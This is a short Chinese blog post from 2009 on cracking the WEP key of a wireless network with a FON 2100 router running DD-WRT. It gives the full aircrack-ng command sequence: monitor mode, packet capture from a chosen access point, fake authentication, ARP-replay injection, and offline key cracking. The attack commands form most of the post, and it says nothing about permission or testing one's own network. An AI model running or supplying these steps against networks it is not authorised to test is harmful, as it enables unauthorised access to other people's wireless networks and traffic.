作者:admin
时间:2009-10-30 08:21
分类:电脑技术
内容:
FON 2100 破解无线网络WEP密码
fon 刷brainslayer ddwrt v24 sp2 内置aircrack+smbshare 破wep 成功
新版的ddwrt已经内置了aircrack-ng,只是不完美。
http://www.dd-wrt.com/dd-wrtv3/dd-wrt/downloads.html
pc系统为winxp 先共享一个目录air
fon->pc 网线连接。fon ip:192.168.33.1 pc 得到的ip: 192.168.33.136
进ddwrt设置cifs //192.168.33.136/air user , password ,computer name 然后 apply
打开putty, telnet 至 192.168.33.1
(可用mount 检查 cifs是否已经加入路径)
cd /tmp/smbshare/air
然后就是这一堆命令了:
airmon-ng 看一下
wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode monitor
airodump-ng ath0 查看ap列表
airodump-ng -c (频道) -w (抓包输出文件) –bssid (AP’s mac) ath0
开另一个putty telnet
ifconfig 查看自己mac
aireplay-ng -1 0 -e (essid) -a (AP’S mac) -h (自己的mac) ath0
握手成功了也不会有提示,所以多试几次,在第一个telnet窗口会有信息出现。
然后
aireplay-ng -3 -b (AP’S mac) -h (自己的mac) ath0
如果有客户端出现,很快就会注入。抓包好像不是太块。64位wep 5000个data就可以,多些成功率更高。
抓包够了 ctrl-c退出。
因为aircrack-ng 在ddwrt下有fragment错误,所以到windows下
然后在windows下 用aircrack-ng -z *.cap (windows 下先装 aircrack-ng 1.0 beta或更高版本)
如果有几万个data,破解几乎是瞬间。